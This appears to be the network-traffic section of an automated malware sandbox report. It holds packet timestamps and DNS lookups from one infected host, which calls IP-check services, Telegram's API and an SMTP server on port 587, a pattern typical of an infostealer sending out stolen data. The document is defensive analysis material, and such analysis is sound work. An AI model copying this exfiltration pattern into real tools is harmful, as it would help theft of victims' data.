                                                                                                                                            Jan 13, 2025 13:05:49.175030947 CET44349736104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:49.175093889 CET49736443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:49.175364971 CET49736443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:49.175380945 CET44349736104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:49.218388081 CET4973380192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:49.469554901 CET44349735104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:49.471029043 CET49735443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:49.471061945 CET44349735104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:49.596065998 CET44349735104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:49.596141100 CET44349735104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:49.596205950 CET49735443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:49.596640110 CET49735443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:49.600338936 CET4973280192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:49.600913048 CET4973880192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:49.605290890 CET8049732132.226.8.169192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:49.605349064 CET4973280192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:49.605695009 CET8049738132.226.8.169192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:49.605768919 CET4973880192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:49.605870962 CET4973880192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:49.610622883 CET8049738132.226.8.169192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:49.647361040 CET44349736104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:49.648935080 CET49736443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:49.648968935 CET44349736104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:49.804711103 CET44349736104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:49.804780960 CET44349736104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:49.804863930 CET49736443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:49.805346012 CET49736443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:49.809252024 CET4973380192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:49.810363054 CET4973980192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:49.814217091 CET8049733132.226.8.169192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:49.814325094 CET4973380192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:49.815164089 CET8049739132.226.8.169192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:49.815356016 CET4973980192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:49.815552950 CET4973980192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:49.820350885 CET8049739132.226.8.169192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:50.454339981 CET8049738132.226.8.169192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:50.455821037 CET49741443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:50.455853939 CET44349741104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:50.455969095 CET49741443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:50.456264973 CET49741443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:50.456275940 CET44349741104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:50.499665022 CET4973880192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:50.664736032 CET8049739132.226.8.169192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:50.666238070 CET49742443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:50.666273117 CET44349742104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:50.666357040 CET49742443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:50.666621923 CET49742443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:50.666634083 CET44349742104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:50.718465090 CET4973980192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:50.926712036 CET44349741104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:50.934154034 CET49741443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:50.934190989 CET44349741104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:51.061933041 CET44349741104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:51.062005997 CET44349741104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:51.062105894 CET49741443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:51.062886000 CET49741443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:51.074835062 CET4973880192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:51.075740099 CET4974480192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:51.080075026 CET8049738132.226.8.169192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:51.080132961 CET4973880192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:51.080838919 CET8049744132.226.8.169192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:51.081343889 CET4974480192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:51.081343889 CET4974480192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:51.086117983 CET8049744132.226.8.169192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:51.148197889 CET44349742104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:51.155548096 CET49742443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:51.155565977 CET44349742104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:51.282325983 CET44349742104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:51.282393932 CET44349742104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:51.282438993 CET49742443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:51.282866955 CET49742443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:51.285701036 CET4973980192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:51.286604881 CET4974580192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:51.290628910 CET8049739132.226.8.169192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:51.290885925 CET4973980192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:51.291377068 CET8049745132.226.8.169192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:51.291573048 CET4974580192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:51.291662931 CET4974580192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:51.296432972 CET8049745132.226.8.169192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:51.924890995 CET8049744132.226.8.169192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:51.927064896 CET49746443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:51.927113056 CET44349746104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:51.927185059 CET49746443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:51.927748919 CET49746443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:51.927767992 CET44349746104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:51.968388081 CET4974480192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:52.118431091 CET8049745132.226.8.169192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:52.119730949 CET49747443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:52.119780064 CET44349747104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:52.119942904 CET49747443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:52.120282888 CET49747443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:52.120301008 CET44349747104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:52.171524048 CET4974580192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:52.383065939 CET44349746104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:52.395072937 CET49746443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:52.395092010 CET44349746104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:52.512825966 CET44349746104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:52.512907982 CET44349746104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:52.513056993 CET49746443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:52.513535976 CET49746443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:52.517282963 CET4974480192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:52.517882109 CET4974880192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:52.522304058 CET8049744132.226.8.169192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:52.522716045 CET8049748132.226.8.169192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:52.522872925 CET4974880192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:52.522916079 CET4974480192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:52.523053885 CET4974880192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:52.528059006 CET8049748132.226.8.169192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:52.596472979 CET44349747104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:52.640264034 CET49747443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:52.666630983 CET49747443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:52.666639090 CET44349747104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:52.772881985 CET44349747104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:52.772944927 CET44349747104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:52.773019075 CET49747443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:52.791047096 CET49747443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:52.807337046 CET4974580192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:52.812352896 CET8049745132.226.8.169192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:52.812412024 CET4974580192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:52.815291882 CET49749443192.168.2.8149.154.167.220
                                                                                                                                            Jan 13, 2025 13:05:52.815332890 CET44349749149.154.167.220192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:52.815407991 CET49749443192.168.2.8149.154.167.220
                                                                                                                                            Jan 13, 2025 13:05:52.815824986 CET49749443192.168.2.8149.154.167.220
                                                                                                                                            Jan 13, 2025 13:05:52.815840960 CET44349749149.154.167.220192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:53.354266882 CET8049748132.226.8.169192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:53.356257915 CET49750443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:53.356307983 CET44349750104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:53.356625080 CET49750443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:53.356785059 CET49750443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:53.356798887 CET44349750104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:53.406008959 CET4974880192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:53.449354887 CET44349749149.154.167.220192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:53.449672937 CET49749443192.168.2.8149.154.167.220
                                                                                                                                            Jan 13, 2025 13:05:53.454336882 CET49749443192.168.2.8149.154.167.220
                                                                                                                                            Jan 13, 2025 13:05:53.454349041 CET44349749149.154.167.220192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:53.454725981 CET44349749149.154.167.220192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:53.466419935 CET49749443192.168.2.8149.154.167.220
                                                                                                                                            Jan 13, 2025 13:05:53.507332087 CET44349749149.154.167.220192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:53.687707901 CET44349749149.154.167.220192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:53.687952995 CET44349749149.154.167.220192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:53.688324928 CET49749443192.168.2.8149.154.167.220
                                                                                                                                            Jan 13, 2025 13:05:53.692096949 CET49749443192.168.2.8149.154.167.220
                                                                                                                                            Jan 13, 2025 13:05:53.808639050 CET44349750104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:53.811959982 CET49750443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:53.811981916 CET44349750104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:53.949291945 CET44349750104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:53.949412107 CET44349750104.21.112.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:53.949770927 CET49750443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:53.950095892 CET49750443192.168.2.8104.21.112.1
                                                                                                                                            Jan 13, 2025 13:05:53.960031033 CET4974880192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:53.960850000 CET49751443192.168.2.8149.154.167.220
                                                                                                                                            Jan 13, 2025 13:05:53.960897923 CET44349751149.154.167.220192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:53.960968971 CET49751443192.168.2.8149.154.167.220
                                                                                                                                            Jan 13, 2025 13:05:53.961407900 CET49751443192.168.2.8149.154.167.220
                                                                                                                                            Jan 13, 2025 13:05:53.961421967 CET44349751149.154.167.220192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:53.965045929 CET8049748132.226.8.169192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:53.965143919 CET4974880192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:54.634798050 CET44349751149.154.167.220192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:54.634960890 CET49751443192.168.2.8149.154.167.220
                                                                                                                                            Jan 13, 2025 13:05:54.636919022 CET49751443192.168.2.8149.154.167.220
                                                                                                                                            Jan 13, 2025 13:05:54.636926889 CET44349751149.154.167.220192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:54.637187958 CET44349751149.154.167.220192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:54.640036106 CET49751443192.168.2.8149.154.167.220
                                                                                                                                            Jan 13, 2025 13:05:54.683336020 CET44349751149.154.167.220192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:54.883831978 CET44349751149.154.167.220192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:54.884016991 CET44349751149.154.167.220192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:54.884119034 CET49751443192.168.2.8149.154.167.220
                                                                                                                                            Jan 13, 2025 13:05:54.886984110 CET49751443192.168.2.8149.154.167.220
                                                                                                                                            Jan 13, 2025 13:05:58.917501926 CET4972180192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:05:59.278548002 CET49752587192.168.2.8208.91.199.223
                                                                                                                                            Jan 13, 2025 13:05:59.283401966 CET58749752208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:59.283504009 CET49752587192.168.2.8208.91.199.223
                                                                                                                                            Jan 13, 2025 13:06:00.032485008 CET58749752208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:00.032660007 CET49752587192.168.2.8208.91.199.223
                                                                                                                                            Jan 13, 2025 13:06:00.037400961 CET58749752208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:00.078706980 CET4972080192.168.2.8132.226.8.169
                                                                                                                                            Jan 13, 2025 13:06:00.182775974 CET58749752208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:00.183831930 CET49752587192.168.2.8208.91.199.223
                                                                                                                                            Jan 13, 2025 13:06:00.188555002 CET58749752208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:00.219213009 CET49753587192.168.2.8208.91.199.223
                                                                                                                                            Jan 13, 2025 13:06:00.224059105 CET58749753208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:00.224251986 CET49753587192.168.2.8208.91.199.223
                                                                                                                                            Jan 13, 2025 13:06:00.335897923 CET58749752208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:00.337615013 CET49752587192.168.2.8208.91.199.223
                                                                                                                                            Jan 13, 2025 13:06:00.342420101 CET58749752208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:00.777559996 CET58749753208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:00.777909040 CET49753587192.168.2.8208.91.199.223
                                                                                                                                            Jan 13, 2025 13:06:00.784468889 CET58749753208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:00.929347038 CET58749753208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:00.930090904 CET49753587192.168.2.8208.91.199.223
                                                                                                                                            Jan 13, 2025 13:06:00.934901953 CET58749753208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:02.463587999 CET58749752208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:02.464297056 CET49752587192.168.2.8208.91.199.223
                                                                                                                                            Jan 13, 2025 13:06:02.469065905 CET58749752208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:02.617162943 CET58749752208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:02.617480040 CET49752587192.168.2.8208.91.199.223
                                                                                                                                            Jan 13, 2025 13:06:02.622291088 CET58749752208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:02.786401033 CET58749752208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:02.823364973 CET49752587192.168.2.8208.91.199.223
                                                                                                                                            Jan 13, 2025 13:06:02.828377962 CET58749752208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:02.828936100 CET49752587192.168.2.8208.91.199.223
                                                                                                                                            Jan 13, 2025 13:06:04.330447912 CET49754587192.168.2.8208.91.199.223
                                                                                                                                            Jan 13, 2025 13:06:04.335452080 CET58749754208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:04.335604906 CET49754587192.168.2.8208.91.199.223
                                                                                                                                            Jan 13, 2025 13:06:04.538572073 CET6044153192.168.2.8162.159.36.2
                                                                                                                                            Jan 13, 2025 13:06:04.543395042 CET5360441162.159.36.2192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:04.543503046 CET6044153192.168.2.8162.159.36.2
                                                                                                                                            Jan 13, 2025 13:06:04.548398018 CET5360441162.159.36.2192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:04.921638012 CET58749754208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:04.921943903 CET49754587192.168.2.8208.91.199.223
                                                                                                                                            Jan 13, 2025 13:06:04.926809072 CET58749754208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:05.016900063 CET6044153192.168.2.8162.159.36.2
                                                                                                                                            Jan 13, 2025 13:06:05.022053003 CET5360441162.159.36.2192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:05.022120953 CET6044153192.168.2.8162.159.36.2
                                                                                                                                            Jan 13, 2025 13:06:05.068191051 CET58749754208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:05.068413019 CET49754587192.168.2.8208.91.199.223
                                                                                                                                            Jan 13, 2025 13:06:05.073183060 CET58749754208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:05.082957983 CET58749753208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:05.083229065 CET49753587192.168.2.8208.91.199.223
                                                                                                                                            Jan 13, 2025 13:06:05.088025093 CET58749753208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:05.217729092 CET58749754208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:05.218151093 CET49754587192.168.2.8208.91.199.223
                                                                                                                                            Jan 13, 2025 13:06:05.222934008 CET58749754208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:07.202047110 CET58749754208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:07.202209949 CET49754587192.168.2.8208.91.199.223
                                                                                                                                            Jan 13, 2025 13:06:07.207081079 CET58749754208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:07.349786997 CET58749754208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:07.349939108 CET49754587192.168.2.8208.91.199.223
                                                                                                                                            Jan 13, 2025 13:06:07.354788065 CET58749754208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:07.461673021 CET58749753208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:07.461899996 CET49753587192.168.2.8208.91.199.223
                                                                                                                                            Jan 13, 2025 13:06:07.466681957 CET58749753208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:07.512908936 CET58749754208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:07.513314962 CET49754587192.168.2.8208.91.199.223
                                                                                                                                            Jan 13, 2025 13:06:07.518337011 CET58749754208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:07.518393993 CET49754587192.168.2.8208.91.199.223
                                                                                                                                            Jan 13, 2025 13:06:07.614909887 CET58749753208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:07.615109921 CET49753587192.168.2.8208.91.199.223
                                                                                                                                            Jan 13, 2025 13:06:07.619980097 CET58749753208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:07.782290936 CET58749753208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:07.782773972 CET49753587192.168.2.8208.91.199.223
                                                                                                                                            Jan 13, 2025 13:06:07.787821054 CET58749753208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:07.787897110 CET49753587192.168.2.8208.91.199.223
                                                                                                                                            Jan 13, 2025 13:06:09.326602936 CET60445587192.168.2.8208.91.198.143
                                                                                                                                            Jan 13, 2025 13:06:09.331512928 CET58760445208.91.198.143192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:09.331619978 CET60445587192.168.2.8208.91.198.143
                                                                                                                                            Jan 13, 2025 13:06:09.974858046 CET58760445208.91.198.143192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:09.978235960 CET60445587192.168.2.8208.91.198.143
                                                                                                                                            Jan 13, 2025 13:06:09.983536959 CET58760445208.91.198.143192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:10.130167961 CET58760445208.91.198.143192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:10.130414009 CET60445587192.168.2.8208.91.198.143
                                                                                                                                            Jan 13, 2025 13:06:10.135246992 CET58760445208.91.198.143192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:14.296427965 CET58760445208.91.198.143192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:14.296834946 CET60445587192.168.2.8208.91.198.143
                                                                                                                                            Jan 13, 2025 13:06:14.301675081 CET58760445208.91.198.143192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:16.464901924 CET58760445208.91.198.143192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:16.465246916 CET60445587192.168.2.8208.91.198.143
                                                                                                                                            Jan 13, 2025 13:06:16.470055103 CET58760445208.91.198.143192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:16.616797924 CET58760445208.91.198.143192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:16.617073059 CET60445587192.168.2.8208.91.198.143
                                                                                                                                            Jan 13, 2025 13:06:16.621886969 CET58760445208.91.198.143192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:16.787776947 CET58760445208.91.198.143192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:16.788043976 CET60445587192.168.2.8208.91.198.143
                                                                                                                                            Jan 13, 2025 13:06:16.793109894 CET58760445208.91.198.143192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:16.793222904 CET60445587192.168.2.8208.91.198.143

                                                                                                                                            UDP Packets

                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Jan 13, 2025 13:05:35.121440887 CET6313553192.168.2.81.1.1.1
                                                                                                                                            Jan 13, 2025 13:05:35.128900051 CET53631351.1.1.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:39.855284929 CET5879953192.168.2.81.1.1.1
                                                                                                                                            Jan 13, 2025 13:05:39.864368916 CET53587991.1.1.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:52.807939053 CET5667853192.168.2.81.1.1.1
                                                                                                                                            Jan 13, 2025 13:05:52.814594030 CET53566781.1.1.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:05:59.270195007 CET5423053192.168.2.81.1.1.1
                                                                                                                                            Jan 13, 2025 13:05:59.277693033 CET53542301.1.1.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:04.538084984 CET5362219162.159.36.2192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:05.023104906 CET5882453192.168.2.81.1.1.1
                                                                                                                                            Jan 13, 2025 13:06:05.030498028 CET53588241.1.1.1192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:09.307696104 CET5909653192.168.2.81.1.1.1
                                                                                                                                            Jan 13, 2025 13:06:09.315680981 CET53590961.1.1.1192.168.2.8

                                                                                                                                            DNS Queries

                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                            Jan 13, 2025 13:05:35.121440887 CET192.168.2.81.1.1.10x5420Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                            Jan 13, 2025 13:05:39.855284929 CET192.168.2.81.1.1.10xe88fStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                            Jan 13, 2025 13:05:52.807939053 CET192.168.2.81.1.1.10xdb41Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                            Jan 13, 2025 13:05:59.270195007 CET192.168.2.81.1.1.10xf383Standard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)false
                                                                                                                                            Jan 13, 2025 13:06:05.023104906 CET192.168.2.81.1.1.10xb7a2Standard query (0)18.31.95.13.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                                            Jan 13, 2025 13:06:09.307696104 CET192.168.2.81.1.1.10x5400Standard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)false

                                                                                                                                            DNS Answers

                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                            Jan 13, 2025 13:05:35.128900051 CET1.1.1.1192.168.2.80x5420No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 13, 2025 13:05:35.128900051 CET1.1.1.1192.168.2.80x5420No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                            Jan 13, 2025 13:05:35.128900051 CET1.1.1.1192.168.2.80x5420No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                            Jan 13, 2025 13:05:35.128900051 CET1.1.1.1192.168.2.80x5420No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                            Jan 13, 2025 13:05:35.128900051 CET1.1.1.1192.168.2.80x5420No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                            Jan 13, 2025 13:05:35.128900051 CET1.1.1.1192.168.2.80x5420No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                            Jan 13, 2025 13:05:39.864368916 CET1.1.1.1192.168.2.80xe88fNo error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                            Jan 13, 2025 13:05:39.864368916 CET1.1.1.1192.168.2.80xe88fNo error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
